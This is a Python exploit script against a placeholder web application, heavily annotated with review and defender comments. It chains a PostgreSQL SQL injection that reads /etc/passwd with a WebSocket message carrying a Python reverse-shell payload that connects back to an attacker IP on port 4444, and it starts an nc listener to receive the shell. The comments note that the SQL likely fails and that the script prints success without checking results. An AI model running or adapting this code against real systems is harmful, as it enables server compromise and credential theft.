import websocket
import requests
import time
import threading
import os
# Target settings
# Placeholder values: REVERSE_IP is the literal string "YOUR_IP" and is
# interpolated unchanged into the payload built in on_message(), so nothing
# below validates these before use. WEBSOCKET_URL is plain ws:// (cleartext).
TARGET_URL = "http://vulnerable-site.com/vuln-endpoint"
WEBSOCKET_URL = "ws://vulnerable-site.com/socket"
REVERSE_IP = "YOUR_IP"
REVERSE_PORT = 4444
# **1. Perform SQL Injection to create a malicious file on the server**
# What the statement actually does: read /etc/passwd with pg_read_file() and
# write the result to /tmp/payload via lo_export() -- a server-file copy, not
# a "malicious file". Both functions are PostgreSQL server-side file-access
# functions restricted to superusers (or the pg_read_server_files /
# pg_write_server_files roles), so an application connecting with a
# least-privilege role cannot run this; that, plus parameterized queries on
# the "input" field, is the mitigation.
# NOTE(review): pg_read_file() returns text while convert_from() takes bytea,
# and lo_export() expects an oid as its first argument -- as written this
# presumably fails to type-check on the server; verify before relying on it.
sql_payload = """SELECT lo_export(
(SELECT convert_from(pg_read_file('/etc/passwd'), 'UTF8')),
'/tmp/payload'
);"""
# Send SQLi to the server
# The response is discarded: status and body are never inspected.
requests.post(TARGET_URL, data={"input": sql_payload}, headers={"Content-Type": "application/x-www-form-urlencoded"})
# Printed unconditionally -- it reports success whether or not the request did anything.
print("[+] SQL Injection executed, file saved at /tmp/payload.")
# **2. Set up WebSocket and execute RCE**
def on_message(ws, message):
    """WebSocketApp message callback: log the message, then send the payload.

    Args:
        ws: the websocket.WebSocketApp instance that received the message.
        message: the incoming message body; it is only printed, never
            inspected, so every message received (including the server's
            reply to INITIATE_EXPLOIT, presumably) re-triggers the send.

    Returns:
        None.
    """
    print("[+] Received message from WebSocket:", message)
    # Execute RCE using WebSocket
    # The payload is Python source that connects back to REVERSE_IP:REVERSE_PORT,
    # redirects stdin/stdout/stderr onto that socket and runs "/bin/sh -i".
    # The script assumes the server-side handler executes whatever follows
    # "EXECUTE_COMMAND:" -- that handler is the actual vulnerability.
    # Defender notes: never pass WebSocket message content to exec/eval or a
    # subprocess; authenticate the socket and validate the Origin header to
    # block cross-site hijacking. On the host this shows up as the web/app
    # process spawning "/bin/sh -i" with an outbound TCP connection on
    # REVERSE_PORT -- a good detection rule.
    exploit_payload = f"""import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("{REVERSE_IP}",{REVERSE_PORT}));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);"""
    ws.send(f"EXECUTE_COMMAND:{exploit_payload}")
def on_open(ws):
    """WebSocketApp open callback: announce the connection and send the trigger.

    Args:
        ws: the connected websocket.WebSocketApp instance.

    Returns:
        None.

    The "INITIATE_EXPLOIT" text is an application-specific message; nothing
    here checks that the server accepted it -- the follow-up is driven solely
    by whatever reply arrives at on_message().
    """
    print("[+] WebSocket connection established.")
    ws.send("INITIATE_EXPLOIT")
# **3. Perform WebSocket Hijacking**
def start_websocket_exploit():
    """Open the WebSocket to WEBSOCKET_URL and run its event loop.

    Returns:
        None; run_forever() blocks the calling thread until the socket closes,
        which is why the module starts this function in its own thread.

    No Origin header, cookies or auth headers are supplied, so a server that
    enforces origin checks or session binding on the upgrade request would
    refuse this connection -- the standard defence against WebSocket hijacking.
    """
    ws = websocket.WebSocketApp(WEBSOCKET_URL, on_message=on_message, on_open=on_open)
    ws.run_forever()
# **4. Start listener to receive the shell**
def start_listener():
    """Shell out to an external ``nc`` listening on REVERSE_PORT.

    Returns:
        None; os.system() blocks until the nc process exits, and its exit
        status is discarded.

    The f-string is interpolated into a shell command line; that is only
    acceptable because REVERSE_PORT is an int constant defined in this file,
    not user-controlled input. Requires an ``nc`` on PATH that accepts
    ``-lvnp``; nothing here checks that it exists.
    """
    print(f"[+] Listening on {REVERSE_PORT}...")
    os.system(f"nc -lvnp {REVERSE_PORT}")
# Start WebSocket Hijack in a separate thread
# The thread is non-daemon, so the interpreter stays alive while run_forever()
# blocks in it, even after start_listener() returns.
threading.Thread(target=start_websocket_exploit).start()
# Fixed delay only; nothing synchronizes the WebSocket thread with the listener
# started below.
time.sleep(2)
# Start Listener to receive Reverse Shell
# Blocks the main thread inside os.system() until nc exits.
start_listener()